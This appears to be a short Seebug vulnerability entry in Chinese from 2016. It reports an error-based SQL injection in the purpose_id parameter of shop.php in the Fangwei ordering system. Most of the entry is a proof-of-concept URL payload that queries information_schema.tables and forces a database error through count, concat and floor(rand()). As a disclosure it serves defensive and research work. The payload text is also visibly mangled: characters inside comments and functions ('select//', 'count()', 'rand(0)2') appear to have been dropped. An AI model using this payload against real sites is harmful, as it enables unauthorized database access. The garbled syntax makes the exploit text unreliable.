方维订餐系统shop.php sql注入漏洞

2016-01-15T00:00:00
ID SSV:90458
Type seebug
Reporter wonderkun
Modified 2016-01-15T00:00:00

Description

sql报错注入

漏洞位置:

``` /shop.php?ctl=index&act=ajax_purpose_store&purpose_id=1

``` 参数purpose_id 存在sql注入

``` poc:/shop.php?ctl=index&act=ajax_purpose_store&purpose_id=1%20and%20(select//%201%20from//%20(select//%20count(),concat(md5(1),floor(rand(0)2))x%20from//%20information_schema.tables%20group%20by%20x)a)

```